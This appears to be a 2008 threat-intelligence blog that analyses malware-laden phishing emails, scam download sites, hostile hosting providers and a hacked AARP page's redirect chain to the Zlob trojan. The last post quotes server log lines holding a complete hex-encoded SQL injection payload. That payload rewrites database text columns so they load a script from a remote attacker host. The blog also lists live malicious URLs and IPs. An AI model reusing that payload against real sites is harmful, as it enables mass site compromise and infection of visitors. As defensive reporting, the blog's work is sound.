vURL Desktop Edition v0.3.5 Results
Source code for: http://bestsearch3.com/feed/get.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:33:04:33
*****************************************************************
<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>
Posted by MysteryFCM at 19:50
0 comments

Your Pay Pal Account May Be Compromised

I'm used to getting PayPal phishing scams, thats certainly nothing new. However, I've not had one of these in a while - a PayPal infection scam. Unlike your run of the mill Phish, this doesn't include any links to third party servers (other than PayPal themselves), but instead includes an attachment (you know whats coming).

The e-mail itself is pretty straight forward, simply stating;

Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134

Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


The attachment is a 324K zip with the name account-1407A4-report.zip (MD5: 713885a1432fc4a822f9473828045952), I've no doubt that the alphanumeric part will be randomized - they usually are. Avira flagged this one as TR/Crypt.XDR.Gen, and running it through VT showed pretty bad results;

http://www.virustotal.com/analisis/a339e57900d936a58d8fa970d7de6977

... a measly 19/32 have detections for it.

Exported by: Outlook Export v0.1.2


From: security@paypal(dot)com
E-mail:security@paypal(dot)com [ 66.211.168.193 - node-66-211-168-193.networks.paypal(dot)com ]
Date: 24/09/2008 14:23:39
Subject: Your Pay Pal Account May Be Compromised
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal(dot)com/us
Domain: www.paypal(dot)com
IP: 66.211.168.193 [ node-66-211-168-193.networks.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://images.paypal(dot)com/en_US/i/scr/pixel.gif
Domain: images.paypal(dot)com
IP: 66.211.168.128 [ images.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
PayPal <https://www.paypal(dot)com/us>
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134






Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>PayPal <<A HREF="https://www.paypal(dot)com/us">https://www.paypal(dot)com/us</A>>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
Dear member,   <BR>
As part of our security measures, we regularly screen activity in the PayPal system.<BR>
<BR>
We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.<BR>
<BR>
Case ID Number: PP-854-512-134<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
Thank you for your patience as we work together to protect your account.<BR>
<BR>
PayPal Account Review Department       <BR>
PayPal Email ID PP2310 <BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <security@paypal(dot)com>
Delivered-To: services@[ITM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4BB7166E6C5
for <services@[ITM]>; Wed, 24 Sep 2008 14:19:06 +0100 (BST)
Received: from paypal(dot)com (rrcs-24-123-221-42.central.biz.rr.com [24.123.221.42])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id C661766E71A
for <hphosts@[ITM]>; Wed, 24 Sep 2008 14:18:49 +0100 (BST)
From: security@paypal(dot)com
To: hphosts@[ITM]
Subject: Your Pay Pal Account May Be Compromised
Date: Wed, 24 Sep 2008 09:23:39 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_AA8C3ED1.95BE0846"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080924131849.C661766E71A@smtp-in-72.livemail.co.uk>
X-Original-To: hphosts@[ITM]
Posted by MysteryFCM at 06:57
0 comments

Next hpHosts update

Just a note folks, the next update - aslong as nothing else goes wrong (had the mail server go down today, and my laptop is now playing silly buggers), will hopefully be out by Saturday.
Posted by MysteryFCM at 06:54
0 comments

Monday, 22 September 2008

Exclusive photos, you'll be happy!

HA! happy if you like your computer infected with trojans (TR/Dldr.Small.ADMM to be exact) perhaps .....

http://www.virustotal.com/analisis/baccc58a407108294e1d9e245ca75273

This trojan creates a file called rs32net.exe in the %system% folder (generally C:\Windows\System for 9x, System32 for 2000 and above), and connects to the following on port 80;

216.195.56.22
208.66.195.71
208.66.195.15

... it also rather kindly, creates an entry in the registry so it runs each time the computer boots;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rs32net

The e-mail seems to want to both insult us younger folk (heh!) and keep things as short as possible, simply stating;

Hello, old chap.

Watch my tits!

Thanks.


Ah the joys .....

Exported by: Outlook Export v0.1.2


From: Rodney Estrada
E-mail:seamus.danby@acg-wien.at [ 80.243.163.49 - www29.world4you.com ]
Date: 23/09/2008 03:24:48
Subject: Exclusive photos, you'll be happy
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Hello, old chap.

Watch my tits!

Thanks.


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Hello, old chap.<BR>
<BR>
Watch my tits!<BR>
<BR>
Thanks.<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <seamus.danby@acg-wien.at>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-165.livemail.co.uk (Postfix) with SMTP id 97ACFEB0098
for <services@[RMVD]>; Tue, 23 Sep 2008 03:24:55 +0100 (BST)
Received: from ip-154-105-net.express.net.id (ip-154-105-net.express.net.id [203.153.105.154])
by smtp-in-165.livemail.co.uk (Postfix) with ESMTP id 0272DEB0098
for <jane@[RMVD]>; Tue, 23 Sep 2008 03:24:52 +0100 (BST)
Received: from [203.153.105.154] by mail.acg-wien.at; Tue, 23 Sep 2008 10:24:48 +0800
Message-ID: <01c91d66$9aef1800$9a6999cb@seamus.danby>
From: "Rodney Estrada" <seamus.danby@acg-wien.at>
To: <jane@[RMVD]>
Subject: Exclusive photos, you'll be happy
Date: Tue, 23 Sep 2008 10:24:48 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01C91D66.9AEF1800"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.2244.8
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.2244.8
X-Original-To: jane@[RMVD]


Posted by MysteryFCM at 19:30
0 comments

Sunday, 21 September 2008

fSpamList.com Users - There's a new support forum for you!

I've been speaking to Josh, who runs fSpamList.com, and we've setup a new support forum for those users that use his database, and may require help or such with it, along of course, with those who are listed (IP, username or e-mail) and would like to request removal.

The support forums are located at the hpHosts Support Forums, and require free registration before being allowed to post (for obvious reasons).

fSpamList Support
http://forum.hosts-file.net/viewforum.php?f=63

In addition to this, with the help of SysAdMini (MalwareDomainList), I've also modified a PHP script written by Smurf_Minions, to allow it to be used by those that would not only like to be able to check e-mail/IP/usernames against the SFS database, but would also like to check them against the fSpamList database aswell;

[CODE] Querying the fSpamList and StopForumSpam databases
http://forum.hosts-file.net/viewtopic.php?f=64&t=737
Posted by MysteryFCM at 06:59
1 comments

Saturday, 20 September 2008

242 reasons to avoid 78.129.142.9 (RapidSwitch - AS29131)

I've got a little history with these chaps and chapesses, and it ain't good! It all started in February of this year, when I came across two scammy websites;

i-explorer.info
operasoft.info

The latter, thanks to the help of Stein Vråle and the legal/abuse folks at Opera, was shut down. The former however, is still online to date. At the time, it was peddling what they claimed was Internet Explorer 7, but like goofull.com, wanted you to send them an SMS text that surprise surprise, ended up with your paying through the nose. I did report them to RapidSwitch, for all the good it did - evidently RapidSwitch couldn't give a hoot aslong as they're getting paid.

https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

i-explorer.info is now peddling what they claim is Internet Explorer Pro 2.3.6 Final , and surprise surprise, you gotta pay them. As evidenced by the following in the installers nsi.ini file;

You are using a Premium Download.\r\n\r\nTo continue you must get an activation code.



If you click to get an activation code, you are taken to (screenshot);

http://www.i-explorer.info/uk/check_code.php

Which has the lovely little disclaimer at the bottom;


You made a premium download. The server used to download this software needs that you send 3 ( total cost 6 pounds ) sms before installing on your computer. Please read Terms of Service for more info This charge is used to support the virus & spyware check team. Activating Download doesn't mean acquire a software license.


.... and nope, "Terms of Service" is not linkified - thar be nothing to click. The TOS is actually located at;

http://www.i-explorer.info/uk/condiciones.html

... and makes for interesting reading.

Surprisingly, if you go to i-explorer.info (the main homepage), you get redirected to /es and you get what actually seems to be IE 8 beta (this is also not a good thing as I'm pretty sure Microsoft don't allow distribution of their beta's), packaged in a 7zip file. I'll have to do a comparison with the official IE 8 beta from Microsoft to see if they've added/modified anything.

Alas however, this is just one of the sites on this IP, there are many others - and the theme remains the same. i-explorer.net for instance, peddles what they claim is Internet Explorer 8.0.6001.18241 Beta 2 (XP), and leads you to download;

http://www.i-explorer.net/uk/install_IE8WindowsXPx86ENU.exe.exe

Unlike i-explorer.info/es, this definately isn't the official Microsoft beta. As evident by the same thing as previously referenced, appearing in the installers nsi.ini file (the screenshot above is the same theme that appears here).

Once again, you are led to the following in order to pay them;

http://www.i-explorer.net/uk/check_code.php

... which has the same disclaimer as i-explorer.info.

To view the full list of domains running this scam (or at least, those I've got in the hpHosts database), see;

http://hosts-file.net/pest.asp?show=78.129.142.

So what of RapidSwitch? Well, I tried calling, I tried e-mailing, and eventually the RS MD called me to tell me they'd now banned my e-mail address from contacting them - which I found hillarious. His reason? I apparently registered on their system as a customer.

Er nope .... I sent an e-mail to: support@rapidswitch.com, sales@rapidswitch.com as sending it to abuse@, created duplicate tickets.

After the call, I sent them the following;

Dear Sir/Madam,
First and foremost, I would like to complain about the way in which you handle people that telephone yourselves.

Telling me you cannot deal with me over the phone is bad enough, but to also tell me you cannot give me a contact e-mail address (that will NOT result in yet another new ticket being created) over the phone is just taking the mick (which incidentally, is why I'm sending this to both of the e-mail addresses on your contact page). I've already sent an e-mail to your abuse department concerning this, and it created a duplicate ticket, which is why I was calling.

Secondly, I would like to complain about the way your company deals with complaints. I reported one of your customers running site's which are clearly illegal, and if you have such, should be against your terms of service.

Since I have not had a response on the ticket since the 11th, I decided to call this morning - to be told you would not deal with me over the phone. I've provided you with evidence of the illegal activity, and am disgusted that you have allowed the site's to stay online, and have further allowed your client not to respond.

Original:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

Duplicate:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=QFYX-DQU-SXNT&key=dzphkivozj

If contacting the appropriate authorities is the only way to get you to deal with this, then I will be more than happy to do so. Additionally, if you allow this type of activity to occur on your network, I will also do my best
to ensure this practice is publicized.


... and their reply?

Steven,

We have a strict procedure for abuse complaints; please email abuse@rapidswitch.com

Thank you,

Regards,

Paul Tacey-Green
RapidSwitch Ltd
Tel: 020 7106 0730

RapidSwitch Ltd, Technical Building, Priors Way, Maidenhead, SL6 2HP


Woops! Seems Paul wasn't informed that;

1. My domain had been blocked (which itself begs the question of how my e-mail got through).
2. Sending an e-mail to abuse@, creates a ticket, that alas may aswell just be completely ignored, RapidSwitch themselves certainly aren't going to do anything.

Never the less, the fact these are still online, and there's been more popping up since I reported the sites to them, simply proves that RapidSwitch couldn't give a hoot - they're getting paid. Thus my personal recommendation? drop their entire range;


inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
admin-c: AR6363-RIPE
tech-c: AR6363-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

person: Abuse Robot
address: RapidSwitch Ltd
address: Technical Building
address: Priors Way
address: Maidenhead
address: SL6 2HP
phone: +44 (0)20 7106 0730
remarks: ******************************************************
remarks: * ABUSE REPORTS *
remarks: * E-mail: abuse@rapidswitch.com *
remarks: * https://myservers.rapidswitch.com/reportabuse.aspx *
remarks: * IMPORTANT: We are unable to accept abuse reports *
remarks: * any other way except the two methods listed above. *
remarks: ******************************************************
e-mail: abuse@rapidswitch.com
nic-hdl: AR6363-RIPE
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

% Information related to '78.129.128.0/17AS29131'

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered
Posted by MysteryFCM at 05:34
0 comments

Friday, 19 September 2008

cr4nk.ws has gone!

It would seem, the folks at DirectI/Logicboxes, have taken the initiative and actually taken notice of the report I sent them as the WhoIs for cr4nk.ws, is now showing as suspended.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-09-19
Domain Currently Expires: 2009-02-16

Current Nameservers:

ns1.suspended-domain.com
ns2.suspended-domain.com

WhoIs server: whois.website.ws


References:

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html
Posted by MysteryFCM at 08:18
0 comments

cr4nk.ws has moved to Hostfresh

Alas, they're still with DirectI however and they're still actively trying to exploit my servers (amongst other people's of course), so I've fired off another abuse report (perhaps DirectI will actually shut them down this time?).

The new IP for cr4nk.ws is 116.50.15.114 (Hostfresh - AS23898), with the old IP address being 67.225.157.104, the latter of which of course, is Liquid Web (AS32244).

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC


References:

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

hpHosts Online - cr4nk.ws
http://hosts-file.net/?s=cr4nk.ws

Report Slams U.S. Host as Major Source of Badware - Security Fix
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

Spamhaus Blog - Cybercrime's U.S. Home
http://www.spamhaus.org/news.lasso?article=636
Posted by MysteryFCM at 00:16
0 comments

Thursday, 18 September 2008

AARP Site "Hack", more than just porn promotion

There's slightly more to it than just spam for promotion of porn pages via Google. Looking through the code, shows multiple redirections via 301 then 302, which eventually leads to a Cernel hosted site that will infect the unsuspecting user with the Zlob trojan;

Start here;
http://vurl.mysteryfcm.co.uk/?url=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=4&ref=

/Begin edit 22-09-08 00:58

A check a few seconds ago, shows the aarp profile no longer exists. Alas there doesn't seem to be a cache of it either ....

/-End edit 22-09-08 00:58

Next, it leads you to;

http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/in.cgi?2¶meter=teen+galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://www.aarp.org/community/c1w2y8

If you look at the headers (displayed just above the source code), you'll notice the 301 via joyfulclipz.com followed by the 302 via breeddirect.com.

The final result, is the Zlob trojan (12K UPX, 32K unpacked (Visual C++ 6 file) - setup.exe), courtesy of movsdevices.com, as shown in the source at the following.



http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/st/st.php?cat=63&script=1&url=http://www.wootmovs.com/m4/index.php?id=1117&n=teen&a=fireplace&v=2133734&preview=http://img2.joyfulclipz.com/st/thumbs/010/7598829497.jpg&p=100&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://plzwait.info/in.cgi?2¶meter=teen%20galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8

Detection for the file, packed and unpacked, is rubbish :o(

Packed (5/36)
http://www.virustotal.com/analisis/a65ca4aea5af13882b9e3c340a419922

Unpacked (1/36)
http://www.virustotal.com/analisis/9f242182ca38a09c4e050043e22b5b76

Alas I'm in the process of fixing my laptop at the moment, so I'll leave the detailed analysis of the executable to someone else.

Sites involved:

breeddirect.com (78.157.143.200)
joyfulclipz.com (78.108.177.124)
img2.joyfulclipz.com (78.108.177.124, also valid as img1-4.)
wootmovs.com (78.157.143.133)
movsdevices.com (77.91.231.201)

References:

AARP Site Hacked and Spammed
http://www.mxlogic.com/itsecurityblog/1/2008/09/AARP-Site-Hacked-and-Spammed.cfm

Porn Operators Hijack Pages on AARP Website
http://www.darkreading.com/document.asp?doc_id=164115&f_src=darkreading_section_296

Knew I'd find the original reference that led me to this ;o)

Porn Operators Hijack Pages on AARP Website
http://temerc.com/forums/viewtopic.php?f=4&t=5780
Posted by MysteryFCM at 18:21
0 comments

Penguin Panic!

Thar be a new infected e-mail floating round folks. This one comes with a variety of subjects, and so far, a single zip - penguin.panic.zip, which of course, contains an executable (14K) of the same name.

http://www.virustotal.com/analisis/120fb641310e4704565ef683ca33b2d0

The executable does contain a little string that seems to lay claim to it's origins being those of "Botnet Jack";



Subjects I've seen thus far;

Take a break!
Apple: The most popular game!
iPhone's most popular game!
Apple presents iPhone games!
Play iPhone on your PC today.

Content of the e-mails that I've seen thus far include;

Beet my score! (7000 points)!
Steve Jobs presents iPhone!
Take a break!
Famous iPhone games!
iPhone's most popular game!

Needless to say folks, if you receive this, delete it!

References:

hi, botnet Jack here
http://blogs.law.harvard.edu/zeroday/2008/09/18/hi-botnet-jack-here/
Posted by MysteryFCM at 07:41
0 comments

Sporadic e-mail issues

Alas I must've annoyed someone at FastHosts hehe*

Over the past few days, I've noticed a sporadic issue with my being able to connect to my incoming mail server, meaning I can only occasionally, receive it. I've already spoken to my host, and they're going to get in touch with FastHosts about it. In the meantime however, if I don't respond to your e-mail straight away, please be patient - it's not my fault!

* Poor attempt at a joke
Posted by MysteryFCM at 04:03
2 comments

Tuesday, 16 September 2008

EstDomains now allowing WhoIs queries

I was investigating hiskyhost.net (AS43355), due to the fact I've now got 48 domains going through them, that are associated with malware. More interestingly, they all resolve to housing.hiskyhost.net - a hostname that does not itself, actually resolve to an IP;

http://hosts-file.net/?s=housing.hiskyhost.net

During the course of the investigation, I decided to do a WhoIs query, and prior to my trying today, EstDomains have never allowed WhoIs queries, instead opting to either refuse access to their WhoIs server, or as is the case with whois.internet.bs, return complete rubbish (i.e. when querying whois.internet.bs, their WhoIs server will return "D D"). In October 2007, I noticed their server consistently returning the following, irrespective of the domain being queried;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.internic.net

An I/O error occured while sending to the backend.

WhoIs server: whois.estdomains.com


Having done a WhoIs query via the EstDomains website, I decided to try modifying the hpHosts site to do the query directly against their WhoIs server - and what did it return? Surprisingly, it returned the same data as their web interface - something it had never done before;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.crsnic.net

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: HISKYHOST.NET

Registrant:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
ns2.hiskyhost.net
ns1.hiskyhost.net


Administrative Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Technical Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Billing Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Status:ACTIVE


What I am rather interested in however, is their possible connection to hiskyhost.net, 2checkout.com and internet.bs.

As a side note, I've also noticed some of those that previously resolved to housing.hiskyhost.net (e.g. mcdirecting.com), though still going through EstDomains, now resolving to the VDHost Ltd/Ultranet (AS35057) netblock;

http://hosts-file.net/?s=78.157.143.133&sDM=1#matches

This also of course, begs the question of whether there is any relation between these, to EstDomains aswell? Or whether it's just me being overly suspicious. Either way, EstDomains, if they are serious about taking malicious domains offline (and I doubt they are - more likely they're just doing it until they're out of the headlines so to speak), then they need to take both those on VDHost/Ultranet, and those on HiskyHost, offline - as shown by the following, someone's already disabled some of them;

http://hosts-file.net/misc/Hiskyhost_-_VDHost_-_EstDomains.html

In the meantime, hopefully they'll continue to allow access to their WhoIs server, and not "accidentally" disable it??? Time will tell.
Posted by MysteryFCM at 21:23
0 comments

Monday, 15 September 2008

Injection via Hex encoded SQL

I'm not surprised when I see injection attempts against my servers anymore, but I am surprised that they're still going with the same domain. The domain that they've used in this particular attack, is one that I saw a couple months or so ago (though I'm not surprised that the domain is still online, due to where it's hosted).

The entry in my server log for this one is;

Attacker: 116.232.98.101

2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:30:55 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 